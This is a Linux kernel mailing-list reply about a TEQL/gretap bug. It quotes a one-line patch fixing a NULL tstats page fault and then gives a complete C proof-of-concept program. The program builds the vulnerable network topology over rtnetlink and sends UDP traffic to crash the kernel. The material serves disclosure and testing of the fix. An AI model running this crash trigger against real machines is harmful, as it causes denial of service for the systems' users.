Re: [PATCH] net/sched: teql: fix NULL pointer dereference in iptunnel_xmit on TEQL slave xmit
From: Xiang Mei
Date: Wed Mar 04 2026 - 00:23:22 EST
On Wed, Mar 04, 2026 at 12:42:18PM +0800, bestswngs@xxxxxxxxx wrote:
> From: Weiming Shi <bestswngs@xxxxxxxxx>
>
> teql_master_xmit() calls netdev_start_xmit(skb, slave) to transmit
> through slave devices, but does not update skb->dev to the slave device
> beforehand.
>
> When a gretap tunnel is a TEQL slave, the transmit path reaches
> iptunnel_xmit() which saves dev = skb->dev (still pointing to teql0
> master) and later calls iptunnel_xmit_stats(dev, pkt_len). This
> function does:
>
> get_cpu_ptr(dev->tstats)
>
> Since teql_master_setup() does not set dev->pcpu_stat_type to
> NETDEV_PCPU_STAT_TSTATS, the core network stack never allocates tstats
> for teql0, so dev->tstats is NULL. get_cpu_ptr(NULL) computes
> NULL + __per_cpu_offset[cpu], resulting in a page fault.
>
> BUG: unable to handle page fault for address: ffff8880e6659018
> #PF: supervisor write access in kernel mode
> #PF: error_code(0x0002) - not-present page
> PGD 68bc067 P4D 68bc067 PUD 0
> Oops: Oops: 0002 [#1] SMP KASAN PTI
> RIP: 0010:iptunnel_xmit (./include/net/ip_tunnels.h:664 net/ipv4/ip_tunnel_core.c:89)
> Call Trace:
> <TASK>
> ip_tunnel_xmit (net/ipv4/ip_tunnel.c:847)
> __gre_xmit (net/ipv4/ip_gre.c:478)
> gre_tap_xmit (net/ipv4/ip_gre.c:779)
> teql_master_xmit (net/sched/sch_teql.c:319)
> dev_hard_start_xmit (net/core/dev.c:3887)
> sch_direct_xmit (net/sched/sch_generic.c:347)
> __dev_queue_xmit (net/core/dev.c:4802)
> neigh_direct_output (net/core/neighbour.c:1660)
> ip_finish_output2 (net/ipv4/ip_output.c:237)
> __ip_finish_output.part.0 (net/ipv4/ip_output.c:315)
> ip_mc_output (net/ipv4/ip_output.c:369)
> ip_send_skb (net/ipv4/ip_output.c:1508)
> udp_send_skb (net/ipv4/udp.c:1195)
> udp_sendmsg (net/ipv4/udp.c:1485)
> inet_sendmsg (net/ipv4/af_inet.c:859)
> __sys_sendto (net/socket.c:2206)
>
> Fix this by setting skb->dev = slave before calling
> netdev_start_xmit(), so that tunnel xmit functions see the correct
> slave device with properly allocated tstats.
>
> Fixes: 039f50629b7f ("ip_tunnel: Move stats update to iptunnel_xmit()")
> Reported-by: Xiang Mei <xmei5@xxxxxxx>
> Signed-off-by: Weiming Shi <bestswngs@xxxxxxxxx>
> ---
> net/sched/sch_teql.c | 1 +
> 1 file changed, 1 insertion(+)
>
> diff --git a/net/sched/sch_teql.c b/net/sched/sch_teql.c
> index 6e4bdaa876ed..783300d8b019 100644
> --- a/net/sched/sch_teql.c
> +++ b/net/sched/sch_teql.c
> @@ -315,6 +315,7 @@ static netdev_tx_t teql_master_xmit(struct sk_buff *skb, struct net_device *dev)
> if (__netif_tx_trylock(slave_txq)) {
> unsigned int length = qdisc_pkt_len(skb);
>
> + skb->dev = slave;
> if (!netif_xmit_frozen_or_stopped(slave_txq) &&
> netdev_start_xmit(skb, slave, slave_txq, false) ==
> NETDEV_TX_OK) {
> --
> 2.43.0
>
Here is a PoC for your reference. Please test it on a kernel built with the following options enabled:
```
CONFIG_NET_SCHED=y # qdisc framework
CONFIG_NET_SCH_TEQL=y # the buggy TEQL qdisc
CONFIG_NET_IPGRE_DEMUX=y # GRE demux
CONFIG_NET_IPGRE=y # gretap tunnel
CONFIG_NET_IP_TUNNEL=y # ip tunnel core
```
```c
// PoC: TEQL iptunnel_xmit NULL tstats page fault
//
// Bug: When a gretap device is a TEQL slave and transmits a packet,
// iptunnel_xmit() reads skb->dev to update per-CPU tunnel stats.
// However, skb->dev still points to the teql0 master device (not
// the gretap slave), and teql0 does not allocate dev->tstats.
// This causes a NULL pointer dereference in iptunnel_xmit_stats().
//
// Root Cause:
// teql_master_xmit() calls netdev_start_xmit(skb, slave, ...) to
// send the skb through a gretap slave. However, it does NOT set
// skb->dev = slave beforehand. Neither does netdev_start_xmit(),
// gre_tap_xmit(), __gre_xmit(), nor ip_tunnel_xmit().
//
// So when iptunnel_xmit() saves dev = skb->dev (line 57 of
// ip_tunnel_core.c), dev is still teql0, not gretapN.
//
// After ip_local_out(), iptunnel_xmit_stats(dev, pkt_len) calls:
// get_cpu_ptr(dev->tstats)
//
// teql0->tstats is NULL because teql_master_setup() does not set
// dev->pcpu_stat_type = NETDEV_PCPU_STAT_TSTATS, so the core
// network stack never allocates tstats for teql0.
//
// get_cpu_ptr(NULL) computes: NULL + __per_cpu_offset[cpu]
// = __per_cpu_offset[0] (the GS base), which may point to an
// unmapped page (PUD=0), causing a page fault.
//
// Call trace:
// sendto() [userspace]
// udp_sendmsg
// ip_send_skb -> ip_mc_output -> ip_finish_output2
// neigh_direct_output -> __dev_queue_xmit(teql0)
// sch_direct_xmit -> dev_hard_start_xmit
// teql_master_xmit
// netdev_start_xmit(skb, gretapN) <-- skb->dev still = teql0
// gre_tap_xmit -> __gre_xmit
// ip_tunnel_xmit -> iptunnel_xmit
// dev = skb->dev = teql0 <-- teql0, NOT gretapN!
// ip_local_out(...)
// iptunnel_xmit_stats(dev, ...)
// get_cpu_ptr(dev->tstats) <-- dev->tstats == NULL
// CRASH: page fault
//
// Topology:
// teql0 (master, 10.1.1.1/24)
// gretap1..3 (TEQL slaves, remotes 10.1.1.2..4, routed via teql0)
// Static ARP entries on teql0 for 10.1.1.2..4
//
// Trigger: send multicast or unicast UDP through teql0
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/if_link.h>
#include <linux/if_tunnel.h>
#include <linux/neighbour.h>
#include <linux/pkt_sched.h>
#include <arpa/inet.h>
extern unsigned int if_nametoindex(const char *__ifname);
#ifndef IFF_UP
#define IFF_UP 0x1
#endif
/*
 * Scratch state for building one netlink request in place and for
 * receiving the kernel's reply into the same storage.
 */
struct nlmsg {
/* Write cursor inside buf: where the next attribute will be placed. */
char *pos;
/* Number of nested attributes currently open (index into nested[]). */
int nesting;
/* Stack of open nested attributes; nl_nest() pushes, nl_done() pops. */
struct nlattr *nested[8];
/* Message storage: request is built here, reply is received here. */
char buf[8192];
};
/*
 * Reset @nlmsg and begin a new request of type @typ.
 *
 * The whole structure is zeroed, then a netlink header is placed at the
 * start of the buffer with NLM_F_REQUEST | NLM_F_ACK | @flags, followed
 * by @size bytes of family-specific header copied from @data. The write
 * cursor ends up on the aligned offset just past that payload.
 *
 * No bounds checking is performed; the caller must keep the message
 * within the buffer.
 */
static void nl_init(struct nlmsg *nlmsg, int typ, int flags,
                    const void *data, int size)
{
    struct nlmsghdr *hdr;
    char *payload;

    memset(nlmsg, 0, sizeof(*nlmsg));

    hdr = (struct nlmsghdr *)nlmsg->buf;
    hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags;
    hdr->nlmsg_type = typ;

    /* The family header sits immediately after the netlink header. */
    payload = (char *)(hdr + 1);
    memcpy(payload, data, size);
    nlmsg->pos = payload + NLMSG_ALIGN(size);
}
/*
 * Append one attribute of type @typ carrying @size bytes from @data at
 * the current write cursor, then advance the cursor to the next aligned
 * offset.
 *
 * A @size of zero (or less) emits a header-only attribute. No bounds
 * checking is performed.
 */
static void nl_attr(struct nlmsg *nlmsg, int typ, const void *data, int size)
{
    struct nlattr *attr = (struct nlattr *)nlmsg->pos;

    attr->nla_type = typ;
    attr->nla_len = sizeof(*attr) + size;
    if (size > 0)
        memcpy((char *)attr + sizeof(*attr), data, size);

    /* nla_len excludes padding; the cursor must include it. */
    nlmsg->pos = (char *)attr + NLMSG_ALIGN(attr->nla_len);
}
/*
 * Open a nested attribute of type @typ at the write cursor.
 *
 * Only the type is written now; the length is filled in by the matching
 * nl_done(). The attribute is pushed on the nesting stack and the cursor
 * moves past its header so children are appended inside it.
 *
 * The stack depth is not checked against the size of nested[].
 */
static void nl_nest(struct nlmsg *nlmsg, int typ)
{
    struct nlattr *container = (struct nlattr *)nlmsg->pos;
    int depth = nlmsg->nesting;

    container->nla_type = typ;
    nlmsg->nested[depth] = container;
    nlmsg->nesting = depth + 1;
    nlmsg->pos = (char *)container + sizeof(*container);
}
/*
 * Close the most recently opened nested attribute: pop it from the
 * nesting stack and set its length to the distance from its header to
 * the current write cursor.
 *
 * Must be paired with an earlier nl_nest(); an unbalanced call is not
 * detected.
 */
static void nl_done(struct nlmsg *nlmsg)
{
    int depth = nlmsg->nesting - 1;
    struct nlattr *container = nlmsg->nested[depth];

    nlmsg->nesting = depth;
    container->nla_len = nlmsg->pos - (char *)container;
}
/*
 * Finalise the request in @nlmsg, send it to the kernel over @sock and
 * wait for a single reply, which overwrites the request buffer.
 *
 * Returns 0 on success (an ACK, or any non-error reply). On failure
 * returns non-zero with errno describing the problem:
 *   - -1 with errno from sendto()/recv() when the syscall itself fails,
 *   - -1 with errno = EIO when the request was only partially sent,
 *   - -1 with errno = EPROTO when the reply is too short to hold an
 *     NLMSG_ERROR message,
 *   - -err with errno = err when the kernel answers with error code err.
 *
 * Callers print strerror(errno) on failure, so every failure path must
 * leave errno meaningful rather than stale.
 */
static int nl_send(struct nlmsg *nlmsg, int sock)
{
    struct nlmsghdr *hdr = (struct nlmsghdr *)nlmsg->buf;
    struct sockaddr_nl addr = { .nl_family = AF_NETLINK };
    ssize_t n;

    /* The total length is only known once all attributes are appended. */
    hdr->nlmsg_len = nlmsg->pos - nlmsg->buf;

    n = sendto(sock, nlmsg->buf, hdr->nlmsg_len, 0,
               (struct sockaddr *)&addr, sizeof(addr));
    if (n < 0)
        return -1; /* errno set by sendto() */
    if (n != (ssize_t)hdr->nlmsg_len) {
        errno = EIO; /* short send: sendto() did not set errno */
        return -1;
    }

    n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0);
    if (n < 0)
        return -1; /* errno set by recv() */
    if (n < (ssize_t)(sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr))) {
        errno = EPROTO; /* truncated reply: recv() did not set errno */
        return -1;
    }

    hdr = (struct nlmsghdr *)nlmsg->buf;
    if (hdr->nlmsg_type == NLMSG_ERROR) {
        /* The kernel reports a negative errno; 0 means plain ACK. */
        int err = -((struct nlmsgerr *)(hdr + 1))->error;

        if (err) {
            errno = err;
            return -err;
        }
    }
    return 0;
}
/*
 * Set interface @name administratively up (@up non-zero) or down via an
 * RTM_NEWLINK request that changes only the IFF_UP flag.
 *
 * Returns -1 without printing anything if @name does not resolve to an
 * interface index; otherwise prints a one-line status and returns the
 * result of nl_send().
 */
static int dev_updown(int sock, struct nlmsg *nlmsg, const char *name, int up)
{
    struct ifinfomsg link = {
        .ifi_index = if_nametoindex(name),
        .ifi_change = IFF_UP, /* mask: touch only the IFF_UP bit */
    };
    int rc;

    if (link.ifi_index == 0)
        return -1;

    if (up)
        link.ifi_flags = IFF_UP;

    nl_init(nlmsg, RTM_NEWLINK, 0, &link, sizeof(link));
    rc = nl_send(nlmsg, sock);
    printf(" %s %s: %s\n", up ? "up" : "down", name, rc ? strerror(errno) : "ok");
    return rc;
}
/*
 * Assign IPv4 address @addr_str/@prefix to interface @dev with an
 * RTM_NEWADDR request (create or replace). The same address is sent as
 * both IFA_LOCAL and IFA_ADDRESS.
 *
 * Prints a one-line status and returns 0 on success, non-zero on
 * failure. If @addr_str is not a valid dotted-quad address nothing is
 * sent and -1 is returned with errno = EINVAL, instead of transmitting
 * an uninitialised address.
 */
static int add_addr4(int sock, struct nlmsg *nlmsg, const char *dev,
                     const char *addr_str, int prefix)
{
    struct ifaddrmsg hdr = {
        .ifa_family = AF_INET,
        .ifa_prefixlen = prefix,
        .ifa_index = if_nametoindex(dev),
    };
    struct in_addr addr;
    int ret;

    if (inet_pton(AF_INET, addr_str, &addr) != 1) {
        /* inet_pton() returns 0 without setting errno on bad text. */
        errno = EINVAL;
        ret = -1;
    } else {
        nl_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
        nl_attr(nlmsg, IFA_LOCAL, &addr, sizeof(addr));
        nl_attr(nlmsg, IFA_ADDRESS, &addr, sizeof(addr));
        ret = nl_send(nlmsg, sock);
    }

    printf(" addr %s %s/%d: %s\n", dev, addr_str, prefix, ret ? strerror(errno) : "ok");
    return ret;
}
/*
 * Install a permanent IPv4 neighbour (static ARP) entry on @dev mapping
 * @addr_str to the 6-byte link-layer address @mac, using RTM_NEWNEIGH
 * (create or replace).
 *
 * Prints a one-line status and returns 0 on success, non-zero on
 * failure. If @addr_str is not a valid dotted-quad address nothing is
 * sent and -1 is returned with errno = EINVAL, instead of transmitting
 * an uninitialised address.
 */
static int add_neigh4(int sock, struct nlmsg *nlmsg, const char *dev,
                      const char *addr_str, const unsigned char *mac)
{
    struct ndmsg hdr = {
        .ndm_family = AF_INET,
        .ndm_ifindex = if_nametoindex(dev),
        .ndm_state = NUD_PERMANENT,
    };
    struct in_addr addr;
    int ret;

    if (inet_pton(AF_INET, addr_str, &addr) != 1) {
        /* inet_pton() returns 0 without setting errno on bad text. */
        errno = EINVAL;
        ret = -1;
    } else {
        nl_init(nlmsg, RTM_NEWNEIGH, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
        nl_attr(nlmsg, NDA_DST, &addr, sizeof(addr));
        nl_attr(nlmsg, NDA_LLADDR, mac, 6); /* Ethernet MAC length */
        ret = nl_send(nlmsg, sock);
    }

    printf(" neigh %s %s: %s\n", dev, addr_str, ret ? strerror(errno) : "ok");
    return ret;
}
/*
 * Create a gretap link named @name whose tunnel remote endpoint is
 * @remote. @remote is passed through verbatim as the IFLA_GRE_REMOTE
 * payload (callers hand in the s_addr produced by inet_pton()).
 *
 * The request fails if the link already exists (NLM_F_EXCL). Prints a
 * one-line status and returns the result of nl_send().
 */
static int create_gretap(int sock, struct nlmsg *nlmsg, const char *name,
                         uint32_t remote)
{
    static const char kind[] = "gretap";
    struct ifinfomsg link = {0};
    int rc;

    nl_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &link, sizeof(link));
    nl_attr(nlmsg, IFLA_IFNAME, name, strlen(name) + 1);

    /* IFLA_LINKINFO { IFLA_INFO_KIND, IFLA_INFO_DATA { IFLA_GRE_REMOTE } } */
    nl_nest(nlmsg, IFLA_LINKINFO);
    /* Kind is sent without its terminating NUL, as in the original. */
    nl_attr(nlmsg, IFLA_INFO_KIND, kind, sizeof(kind) - 1);
    nl_nest(nlmsg, IFLA_INFO_DATA);
    nl_attr(nlmsg, IFLA_GRE_REMOTE, &remote, sizeof(remote));
    nl_done(nlmsg);
    nl_done(nlmsg);

    rc = nl_send(nlmsg, sock);
    printf(" create gretap %s: %s\n", name, rc ? strerror(errno) : "ok");
    return rc;
}
/*
 * Install the "teql0" qdisc as the root qdisc of @dev with an
 * RTM_NEWQDISC request (create or replace).
 *
 * Prints a one-line status and returns the result of nl_send().
 */
static int replace_qdisc_teql(int sock, struct nlmsg *nlmsg, const char *dev)
{
    static const char kind[] = "teql0";
    struct tcmsg tc = {
        .tcm_family = AF_UNSPEC,
        .tcm_ifindex = if_nametoindex(dev),
        .tcm_handle = 0,
        .tcm_parent = TC_H_ROOT,
    };
    int rc;

    nl_init(nlmsg, RTM_NEWQDISC, NLM_F_CREATE | NLM_F_REPLACE, &tc, sizeof(tc));
    /* Kind string is sent including its terminating NUL. */
    nl_attr(nlmsg, TCA_KIND, kind, sizeof(kind));

    rc = nl_send(nlmsg, sock);
    printf(" qdisc %s -> teql0: %s\n", dev, rc ? strerror(errno) : "ok");
    return rc;
}
/*
 * Send five copies of a 64-byte "trigger" datagram from @fd to UDP port
 * 9999 at IPv4 address @dst_ip, printing the result of each send and
 * pausing 100 ms between sends.
 */
static void send_probes(int fd, const char *dst_ip)
{
    struct sockaddr_in dst = {
        .sin_family = AF_INET,
        .sin_port = htons(9999),
    };
    char buf[64] = "trigger";

    inet_pton(AF_INET, dst_ip, &dst.sin_addr);
    for (int i = 0; i < 5; i++) {
        ssize_t n = sendto(fd, buf, sizeof(buf), 0,
                           (struct sockaddr *)&dst, sizeof(dst));
        printf(" send #%d: %zd (%s)\n", i, n, n < 0 ? strerror(errno) : "ok");
        usleep(100000);
    }
}

/*
 * PoC driver: build the teql0 + gretap slave topology over rtnetlink,
 * then push UDP traffic through teql0 to reach the faulty transmit path.
 *
 * Setup steps are best-effort: each helper prints its own status and
 * the program keeps going so that a partially prepared system (for
 * example, links left over from a previous run) can still be exercised.
 *
 * Returns 1 if the netlink socket cannot be created, 0 otherwise.
 */
int main(void)
{
    enum { NUM_SLAVES = 3 };
    static const char master[] = "teql0";
    unsigned char fake_mac[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};
    struct nlmsg nlmsg;
    struct in_addr remote;
    char gname[16], rstr[32];
    int sock, fd;

    printf("[*] PoC: TEQL iptunnel_xmit NULL tstats crash\n");
    printf("[*] Bug: teql_master_xmit doesn't set skb->dev to slave device\n");
    printf("[*] before calling netdev_start_xmit(skb, slave).\n");
    printf("[*] So iptunnel_xmit() reads skb->dev = teql0 (master),\n");
    printf("[*] but teql0->tstats is NULL -> page fault.\n\n");

    sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    printf("[*] Step 1: Bring up loopback\n");
    dev_updown(sock, &nlmsg, "lo", 1);

    printf("[*] Step 2: Create gretap tunnels\n");
    for (int i = 0; i < NUM_SLAVES; i++) {
        snprintf(gname, sizeof(gname), "gretap%d", i + 1);
        snprintf(rstr, sizeof(rstr), "10.1.1.%d", i + 2);
        inet_pton(AF_INET, rstr, &remote);
        create_gretap(sock, &nlmsg, gname, remote.s_addr);
    }

    printf("[*] Step 3: Bring up gretaps and attach teql0 qdisc\n");
    for (int i = 0; i < NUM_SLAVES; i++) {
        snprintf(gname, sizeof(gname), "gretap%d", i + 1);
        dev_updown(sock, &nlmsg, gname, 1);
        replace_qdisc_teql(sock, &nlmsg, gname);
    }

    printf("[*] Step 4: Configure teql0\n");
    dev_updown(sock, &nlmsg, master, 1);
    add_addr4(sock, &nlmsg, master, "10.1.1.1", 24);

    printf("[*] Step 5: Add ARP entries\n");
    for (int i = 0; i < NUM_SLAVES; i++) {
        snprintf(rstr, sizeof(rstr), "10.1.1.%d", i + 2);
        fake_mac[5] = 0x55 + i;
        add_neigh4(sock, &nlmsg, master, rstr, fake_mac);
    }

    printf("[*] Step 6: Send multicast through teql0 to trigger crash\n");
    fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd >= 0) {
        int ttl = 1;

        /*
         * Without the device binding the multicast packets may leave
         * through another interface and never hit teql0, so report a
         * failure instead of silently not triggering.
         */
        if (setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, master, sizeof(master)) < 0)
            perror(" SO_BINDTODEVICE");
        if (setsockopt(fd, IPPROTO_IP, IP_MULTICAST_TTL, &ttl, sizeof(ttl)) < 0)
            perror(" IP_MULTICAST_TTL");
        send_probes(fd, "224.0.0.1");
        close(fd);
    } else {
        perror(" socket");
    }

    printf("[*] Also try unicast\n");
    fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd >= 0) {
        send_probes(fd, "10.1.1.2");
        close(fd);
    } else {
        perror(" socket");
    }

    printf("[*] Done. Check dmesg for BUG/Oops.\n");
    sleep(3);
    close(sock);
    return 0;
}
```
Thanks,
Xiang